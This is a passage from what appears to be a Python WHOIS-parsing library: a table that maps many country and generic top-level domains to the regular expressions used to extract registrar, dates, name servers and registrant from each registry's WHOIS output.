Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"cl\"] = {\n \"extend\": \"com\",\n \"registrar\": R(\"nic.cl\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.+)\\s*\"),\n}\n\nZZ[\"cn\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Sponsoring Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant:\\s?(.+)\"),\n \"creation_date\": R(r\"Registration Time:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Time:\\s?(.+)\"),\n}\n\nZZ[\"com.tr\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.trabis.gov.tr\",\n \"domain_name\": R(r\"\\*\\* Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Organization Name\\s+:\\s?(.+)\"),\n \"registrant\": R(r\"\\*\\* Registrant:\\s+?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Created on\\.+:\\s?(.+).\"),\n \"expiration_date\": R(r\"Expires on\\.+:\\s?(.+).\"), # note the trailing . on both dates fields\n \"updated_date\": None,\n \"name_servers\": R(r\"\\*\\* Domain Servers:\\n(?:(\\S+).*\\n)?(?:(\\S+).*\\n)?(?:(\\S+).*\\n)?(?:(\\S+).*\\n)?\"), # allow for ip addresses after the name server\n \"status\": None,\n \"_test\": \"google.com.tr\",\n}\n\nZZ[\"co.il\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"domain:\\s*(.+)\"),\n \"registrar\": R(r\"registrar name:\\s*(.+)\"),\n \"registrant\": None,\n \"registrant_country\": None,\n \"creation_date\": None,\n \"expiration_date\": R(r\"validity:\\s*(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s*(.+)\"),\n}\n\nZZ[\"co.cz\"] = {\"extend\": \"cz\"}\nZZ[\"cz\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s+(\\S+)\"),\n \"status\": R(r\"status:\\s*(.+)\"),\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"contact:\\s*{}\\n\",\n extract=r\"org:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n}\n\nZZ[\"de\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"\\ndomain:\\s*(.+)\"),\n \"updated_date\": R(r\"\\nChanged:\\s?(.+)\"),\n \"name_servers\": R(r\"Nserver:\\s*(.+)\"),\n}\n\n# Denmark\nZZ[\"dk\"] = {\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"registrar\": None,\n \"registrant\": R(r\"Registrant\\s*Handle:\\s*\\w*\\s*Name:\\s?(.+)\"),\n \"registrant_country\": R(r\"Country:\\s?(.+)\"),\n \"creation_date\": R(r\"Registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expires:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"Hostname:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": None,\n}\n\nZZ[\"edu\"] = {\n \"extend\": \"com\",\n \"registrant\": R(r\"Registrant:\\s*(.+)\"),\n \"creation_date\": R(r\"Domain record activated:\\s?(.+)\"),\n \"updated_date\": R(r\"Domain record last updated:\\s?(.+)\"),\n \"expiration_date\": R(r\"Domain expires:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Servers:\\s?%s\" % xStr(r\"(?:\\t(.+)\\n)?\", 10)),\n \"_test\": \"rutgers.edu\",\n}\n\n# estonian\nZZ[\"ee\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\nname:\\s+(.+\\.ee)\\n\"),\n \"registrar\": R(r\"Registrar:\\nname:\\s+(.+)\\n\"),\n \"registrant\": R(r\"Registrant:\\nname:\\s+(.+)\\n\"),\n \"registrant_country\": R(r\"Registrant:(?:\\n+.+\\n*)*country:\\s+(.+)\\n\"),\n \"creation_date\": R(r\"Domain:(?:\\n+.+\\n*)*registered:\\s+(.+)\\n\"),\n \"expiration_date\": R(r\"Domain:(?:\\n+.+\\n*)*expire:\\s+(.+)\\n\"),\n \"updated_date\": R(r\"Domain:(?:\\n+.+\\n*)*changed:\\s+(.+)\\n\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"Domain:(?:\\n+.+\\n*)*status:\\s+(.+)\\n\"),\n}\n\nZZ[\"eu\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.eu\",\n \"registrar\": R(r\"Name:\\s?(.+)\"),\n \"domain_name\": R(r\"\\nDomain:\\s*(.+)\"),\n \"name_servers\": R(r\"Name servers:\\n(?:\\s+(\\S+)\\n)(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)?(?:\\s+(\\S+)\\n)\\n?\"),\n}\n\nZZ[\"fi\"] = {\n \"domain_name\": R(r\"domain\\.+:\\s?(.+)\"),\n \"registrar\": R(r\"registrar\\.+:\\s?(.+)\"),\n \"creation_date\": R(r\"created\\.+:\\s?(.+)\"),\n \"expiration_date\": R(r\"expires\\.+:\\s?(.+)\"),\n \"updated_date\": R(r\"modified\\.+:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver\\.+:\\s*(.+)\"),\n \"status\": R(r\"status\\.+:\\s?(.+)\"),\n \"registrant\": R(r\"Holder\\s*\\n\\s*name\\.*:\\s*([^\\n]*)\\n\"),\n \"registrant_country\": R(r\"\\ncountry\\.*:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"fr\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s*(.+)\"),\n # \"registrant\": R(r\"contact:\\s?(.+)\"),\n # \"registrant_organization\": R(r\"type:\\s+ORGANIZATION\\scontact:\\s+(.*)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"last-update:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n # \"registrant_country\": R(r\"Country:\\s?(.+)\"),\n \"_test\": \"sfr.fr\",\n \"registrant\": findFromToAndLookForWithFindFirst(\n findFirst=r\"holder-c:\\s*([^\\n]*)\\n\",\n fromStr=r\"nic-hdl:\\s*{}\\n\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"contact:\\s*([^\\n]*)\\n\",\n ),\n \"registrant_country\": findFromToAndLookForWithFindFirst(\n findFirst=r\"holder-c:\\s*([^\\n]*)\\n\",\n fromStr=r\"nic-hdl:\\s*{}\\n\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"country:\\s*([^\\n]*)\\n\",\n ),\n}\n\n# Hong Kong\nZZ[\"hk\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.hkirc.hk\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar Name:\\s?(.+)\"),\n \"registrant\": R(r\"Company English Name.*:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Domain Name Commencement Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": None,\n # name servers have trailing whitespace, lines are \\n only\n \"name_servers\": R(r\"Name Servers Information:\\s*(?:(\\S+)[ \\t]*\\n)(?:(\\S+)[ \\t]*\\n)?(?:(\\S+)[ \\t]*\\n)?(?:(\\S+)[ \\t]*\\n)?\"),\n \"status\": None,\n \"_test\": \"hkirc.hk\",\n}\n\nZZ[\"id\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Sponsoring Registrar Organization:\\s?(.+)\"),\n \"creation_date\": R(r\"Created On:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Updated On:\\s?(.+)$\"),\n}\n\nZZ[\"im\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"status\": None,\n \"registrar\": None,\n \"registrant_country\": None,\n \"creation_date\": None,\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"Name Server:(.+)\"),\n \"registrant\": R(r\"Domain Owners / Registrant\\s*\\n\\s*Name:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"ir\"] = {\n \"_server\": \"whois.nic.ir\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(\"nic.ir\"),\n \"registrant_country\": None,\n \"creation_date\": None,\n \"status\": None,\n \"expiration_date\": R(r\"expire-date:\\s?(.+)\"),\n \"updated_date\": R(r\"last-updated:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"_test\": \"nic.ir\",\n}\n\nZZ[\"is\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.isnic.is\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": None,\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expires:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"nserver:\\s?(.+)\"),\n \"status\": None,\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"nic-hdl:\\s*{}\\n\",\n extract=r\"role:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n \"_test\": \"isnic.is\",\n}\n\nZZ[\"it\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar\\s*Organization:\\s*(.+)\"),\n \"registrant\": R(r\"Registrant\\s*Organization:\\s*(.+)\"),\n \"creation_date\": R(r\"Created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expire Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Update:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameservers(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\n# The Japanese whois servers always return English unless a Japanese locale is specified in the user's LANG environmental variable.\n# See: https://www.computerhope.com/unix/uwhois.htm\n# Additionally, whois qeuries can explicitly request english:\n# To suppress Japanese output, add'/e' at the end of command, e.g. 'whois -h whois.jprs.jp xxx/e'.\n#\nZZ[\"jp\"] = {\n \"domain_name\": R(r\"\\[Domain Name\\]\\s?(.+)\"),\n \"registrar\": R(r\"\\[ (.+) database provides information on network administration. Its use is \\]\"),\n \"registrant\": R(r\"\\[Registrant\\]\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"\\[Created on\\]\\s?(.+)\"),\n \"expiration_date\": R(r\"\\[Expires on\\]\\s?(.+)\"),\n \"updated_date\": R(r\"\\[Last Updated\\]\\s?(.+)\"),\n \"name_servers\": R(r\"\\[Name Server\\]\\s*(.+)\"),\n \"status\": R(r\"\\[Status\\]\\s?(.+)\"),\n \"emails\": R(r\"([\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4})\"),\n}\n\nZZ[\"co.jp\"] = {\n \"extend\": \"jp\",\n \"creation_date\": R(r\"\\[Registered Date\\]([^\\n]*)\\n\"), # possibly use Connected date\n \"expiration_date\": None,\n \"updated_date\": R(r\"\\[Last Update\\]([^\\n]*)\\n\"),\n \"status\": R(r\"\\[State\\]\\s?(.+)\"),\n}\n\nZZ[\"kg\"] = {\n \"domain_name\": R(r\"Domain\\s+(\\S+)\"),\n \"registrar\": R(r\"Billing\\sContact:\\n.*\\n\\s+Name:\\s(.+)\\n\"),\n \"registrant_country\": None,\n \"expiration_date\": R(r\"Record expires on:\\s+(.+)\"),\n \"creation_date\": R(r\"Record created:\\s+(.+)\"),\n \"updated_date\": R(r\"Record last updated on:\\s+(.+)\"),\n \"name_servers\": R(r\"Name servers in the listed order:\\n\\n(?:(\\S+)[ \\t]*\\S*\\n)(?:(\\S+)[ \\t]*\\S*\\n)?(?:(\\S+)[ \\t]*\\S*\\n)?\\n\"),\n \"status\": R(r\"Domain\\s+\\S+\\s+\\((\\S+)\\)\"),\n \"registrant\": R(r\"Administrative\\sContact:\\n.*\\n\\s+Name:\\s(.+)\\n\"),\n}\n\nZZ[\"kr\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.kr\",\n \"domain_name\": R(r\"Domain Name\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"Authorized Agency\\s*:\\s*(.+)\"),\n \"registrant\": R(r\"Registrant\\s*:\\s*(.+)\"),\n \"creation_date\": R(r\"Registered Date\\s*:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date\\s*:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Updated Date\\s*:\\s?(.+)\"),\n \"status\": R(r\"status\\s*:\\s?(.+)\"),\n \"name_servers\": R(r\"Host Name\\s+:\\s+(\\S+)\\n\"),\n}\n\nZZ[\"kz\"] = {\n \"domain_name\": R(r\"Domain name\\.+:\\s(.+)\"),\n \"registrar\": R(r\"Current Registar:\\s(.+)\"),\n \"registrant_country\": R(r\"Country\\.+:\\s?(.+)\"),\n \"expiration_date\": None,\n \"creation_date\": R(r\"Domain created:\\s(.+)\"),\n \"updated_date\": R(r\"Last modified :\\s(.+)\"),\n \"name_servers\": R(r\"ary server\\.+:\\s+(\\S+)\"),\n \"status\": R(r\"Domain status :(?:\\s+([^\\n]+)\\n)\"),\n \"registrant\": R(r\"Organization Using Domain Name\\s*\\n.*\\n\\s*Organization Name\\.*:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"lt\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"creation_date\": R(r\"Registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expires:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"\\nStatus:\\s?(.+)\"),\n}\n\nZZ[\"lv\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.lv\",\n \"domain_name\": R(r\"domain:\\s*(.+)\"),\n \"creation_date\": R(r\"Registered:\\s*(.+)\\n\"), # actually there seem to be no dates\n \"updated_date\": R(r\"Changed:\\s*(.+)\\n\"),\n \"expiration_date\": R(r\"paid-till:\\s*(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"_test\": \"nic.lv\",\n}\n\nZZ[\"me\"] = {\n \"extend\": \"biz\",\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": None, # some entries have no date string but not always\n \"name_servers\": R(r\"Name Server:\\s*(\\S+)\\r?\\n\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n}\n\nZZ[\"ml\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain name:\\s*([^(i|\\n)]+)\"),\n \"registrar\": R(r\"(?<=Owner contact:\\s)[\\s\\S]*?Organization:(.*)\"),\n \"registrant_country\": R(r\"(?<=Owner contact:\\s)[\\s\\S]*?Country:(.*)\"),\n \"registrant\": R(r\"(?<=Owner contact:\\s)[\\s\\S]*?Name:(.*)\"),\n \"creation_date\": R(r\"Domain registered: *(.+)\"),\n \"expiration_date\": R(r\"Record will expire on: *(.+)\"),\n \"name_servers\": R(r\"Domain Nameservers:\\s*(.+)\\n\\s*(.+)\\n\"),\n}\n\nZZ[\"mx\"] = {\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"creation_date\": R(r\"Created On:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Updated On:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"name_servers\": R(r\"\\sDNS:\\s*(.+)\"),\n \"registrant_country\": R(r\"\\n\\s*Country:\\s*([^\\n]*)\\n\"),\n \"status\": None,\n \"registrant\": R(r\"\\nRegistrant:\\s*\\n\\s*Name:\\s([^\\n]*)\\n\"),\n}\nZZ[\"com.mx\"] = {\"extend\": \"mx\"}\n\n# New-Caledonia (French Territory)\nZZ[\"nc\"] = {\n \"extend\": \"fr\",\n \"domain_name\": R(r\"Domain\\s*:\\s(.+)\"),\n \"registrar\": R(r\"Registrar\\s*:\\s(.+)\"),\n \"registrant\": R(r\"Registrant name\\s*:\\s(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Created on\\s*:\\s(.*)\"),\n \"expiration_date\": R(r\"Expires on\\s*:\\s(.*)\"),\n \"updated_date\": R(r\"Last updated on\\s*:\\s(.*)\"),\n \"name_servers\": R(r\"Domain server [0-9]{1,}\\s*:\\s(.*)\"),\n \"status\": None,\n}\n\nZZ[\"nl\"] = {\n \"extend\": \"com\",\n \"expiration_date\": None,\n \"registrant_country\": None,\n \"domain_name\": R(r\"Domain name:\\s?(.+)\"),\n \"name_servers\": R(r\"Domain nameservers.*:\\n%s\" % xStr(r\"(?:\\s+(\\S+)\\n)?\", 10)),\n \"reseller\": R(r\"Reseller:\\s?(.+)\"),\n \"abuse_contact\": R(r\"Abuse Contact:\\s?(.+)\"),\n \"_test\": \"google.nl\",\n \"_slowdown\": 5,\n}\n\n# Norway\nZZ[\"no\"] = {\n \"domain_name\": R(r\"Domain Name\\.+:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar Handle\\.+:\\s?(.+)\"),\n \"registrant\": None,\n \"registrant_country\": None,\n \"creation_date\": R(r\"Created:\\s?(.+)\"),\n \"expiration_date\": None,\n \"updated_date\": R(r\"Last Updated:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server Handle\\.+:\\s*(.+)\\s*\"),\n \"status\": None,\n \"emails\": None,\n}\n\nZZ[\"nyc\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"nz\"] = {\n \"domain_name\": R(r\"domain_name:\\s?(.+)\"),\n \"registrar\": R(r\"registrar_name:\\s?(.+)\"),\n \"registrant\": R(r\"registrant_contact_name:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"domain_dateregistered:\\s?(.+)\"),\n \"expiration_date\": R(r\"domain_datebilleduntil:\\s?(.+)\"),\n \"updated_date\": R(r\"domain_datelastmodified:\\s?(.+)\"),\n \"name_servers\": R(r\"ns_name_[0-9]{2}:\\s?(.+)\"),\n \"status\": R(r\"query_status:\\s?(.+)\"),\n \"emails\": R(r\"([\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4})\"),\n}\n\nZZ[\"co.nz\"] = {\"extend\": \"com\"}\n\nZZ[\"org\"] = {\n \"extend\": \"com\",\n \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"\\nLast Updated On:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s?(.+)\\s*\"),\n}\n\nZZ[\"pharmacy\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n}\n\nZZ[\"pl\"] = {\n \"extend\": \"uk\",\n \"registrar\": R(r\"\\nREGISTRAR:\\s*(.+)\\n\"),\n \"creation_date\": R(r\"\\ncreated:\\s*(.+)\\n\"),\n \"updated_date\": R(r\"\\nlast modified:\\s*(.+)\\n\"),\n \"expiration_date\": R(r\"\\noption expiration date:\\s*(.+)\\n\"),\n \"name_servers\": R(r\"nameservers:%s\" % xStr(r\"(?:\\s+(\\S+)[^\\n]*\\n)?\", 4)),\n \"status\": R(r\"\\nStatus:\\n\\s*(.+)\"),\n}\n\nZZ[\"pt\"] = {\n \"_server\": \"whois.dns.pt\",\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"registrar\": None,\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": None,\n \"name_servers\": R(r\"Name Server:%s\" % xStr(r\"(?:\\s*(\\S+)[^\\n]*\\n)?\", 2)),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n \"_test\": None, # portugal never answeres, timout is all we get\n}\n\nZZ[\"pw\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"ru\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.tcinet.ru\",\n \"domain_name\": R(r\"domain:\\s*(.+)\"),\n \"creation_date\": R(r\"created:\\s*(.+)\"),\n \"expiration_date\": R(r\"paid-till:\\s*(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"state:\\s*(.+)\"),\n \"_test\": \"tcinet.ru\",\n}\n\nZZ[\"sa\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s*(.+\\.sa)\\s\"),\n \"registrant\": R(r\"Registrant:\\n*(.+)\\n\"),\n \"name_servers\": R(r\"Name Servers:\\s*(.+)\\s*(.+)?\"),\n \"registrant_country\": None,\n \"registrar\": None,\n \"creation_date\": None,\n \"expiration_date\": None,\n \"updated_date\": None,\n \"status\": None,\n \"emails\": None,\n}\n\nZZ[\"sh\"] = {\n \"extend\": \"com\",\n \"registrant\": R(r\"\\nRegistrant Organization:\\s?(.+)\"),\n \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s*(.+)\"),\n \"status\": R(r\"\\nDomain Status:\\s?(.+)\"),\n}\n\nZZ[\"se\"] = {\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"created:\\s+(\\d{4}-\\d{2}-\\d{2})\"),\n \"expiration_date\": R(r\"expires:\\s+(\\d{4}-\\d{2}-\\d{2})\"),\n \"updated_date\": R(r\"modified:\\s+(\\d{4}-\\d{2}-\\d{2})\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\"),\n \"status\": R(r\"status:\\s?(.+)\"),\n \"registrant\": R(r\"holder:\\s*([^\\n]*)\\n\"),\n}\n\n# Singapore - Commercial sub-domain\nZZ[\"com.sg\"] = {\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"registrant\": R(r\"Registrant:\\r?\\n\\r?\\n\\s*Name:\\s*(.+)\\r?\\n\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Modified Date:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Servers:(?:\\s+(\\S+))(?:\\s+(\\S+))?(?:\\s+(\\S+))?(?:\\s+([\\.\\w]+)\\s+)?\"),\n \"status\": R(r\"Domain Status:\\s*(.*)\\r?\\n\"),\n \"emails\": R(r\"[\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4}\"),\n}\n\n# Slovakia\nZZ[\"sk\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.sk-nic.sk\",\n \"domain_name\": R(r\"Domain:\\s?(.+)\"),\n \"creation_date\": R(r\"Created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Valid Until:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameserver:\\s*(\\S+)\"),\n \"_test\": \"sk-nic.sk\",\n # look for Organiztion but in the proper section\n \"registrant\": findFromToAndLookFor(\n fromStr=r\"Domain registrant:\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Organization:\\s*([^\\n]*)\\n\",\n ),\n # Country Code:\n \"registrant_country\": findFromToAndLookFor(\n fromStr=r\"Domain registrant:\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Country Code:\\s*([^\\n]*)\\n\",\n ),\n \"registrar\": findFromToAndLookFor(\n fromStr=r\"\\nRegistrar:\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Organization:\\s*([^\\n]*)\\n\",\n verbose=True,\n ),\n}\n\nZZ[\"tel\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\n# Thailand - Commercial sub-domain\nZZ[\"co.th\"] = {\n \"_server\": \"whois.thnic.co.th\",\n \"extend\": \"com\",\n \"registrant\": R(r\"Domain Holder Organization:\\s?(.+)\"),\n \"registrant_country\": R(r\"Domain Holder Country:\\s?(.+)\"),\n \"creation_date\": R(r\"Created date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Exp date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated date:\\s?(.+)\"),\n \"_test\": \"thnic.co.th\",\n}\n\nZZ[\"tn\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain name\\.+:(.+)\\s*\"),\n \"registrar\": R(r\"Registrar\\.+:(.+)\\s*\"),\n \"registrant\": R(r\"Owner Contact\\n+Name\\.+:\\s?(.+)\"),\n \"registrant_country\": R(r\"Owner Contact\\n(?:.+\\n)+Country\\.+:\\s(.+)\"),\n \"creation_date\": R(r\"Creation date\\.+:\\s?(.+)\"),\n \"expiration_date\": None,\n \"updated_date\": None,\n \"name_servers\": R(r\"DNS servers\\n%s\" % xStr(r\"(?:Name\\.+:\\s*(\\S+)\\n)?\", 4)),\n \"status\": R(r\"Domain status\\.+:(.+)\"),\n}\n\nZZ[\"tv\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.tv\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"_test\": \"nic.tv\",\n}\n\nZZ[\"tz\"] = {\n \"domain_name\": R(r\"\\ndomain:\\s*(.+)\"),\n \"registrar\": R(r\"\\nregistrar:\\s?(.+)\"),\n \"registrant\": R(r\"\\nregistrant:\\s*(.+)\"),\n \"registrant_country\": None,\n \"creation_date\": R(r\"\\ncreated:\\s*(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"\\nchanged:\\s*(.+)\"),\n \"status\": None,\n \"name_servers\": R(r\"\\nnserver:\\s*(.+)\"),\n}\n\nZZ[\"ua\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"\\ndomain:\\s*(.+)\"),\n \"registrar\": R(r\"\\nregistrar:\\s*(.+)\"),\n \"registrant_country\": R(r\"\\ncountry:\\s*(.+)\"),\n \"creation_date\": R(r\"\\ncreated:\\s+(.+)\"),\n \"expiration_date\": R(r\"\\nexpires:\\s*(.+)\"),\n \"updated_date\": R(r\"\\nmodified:\\s*(.+)\"),\n \"name_servers\": R(r\"\\nnserver:\\s*(.+)\"),\n \"status\": R(r\"\\nstatus:\\s*(.+)\"),\n}\n\nZZ[\"uk\"] = {\n \"extend\": \"com\",\n \"registrant\": R(r\"Registrant:\\n\\s*(.+)\"),\n \"creation_date\": R(r\"Registered on:\\s*(.+)\"),\n \"expiration_date\": R(r\"Expiry date:\\s*(.+)\"),\n 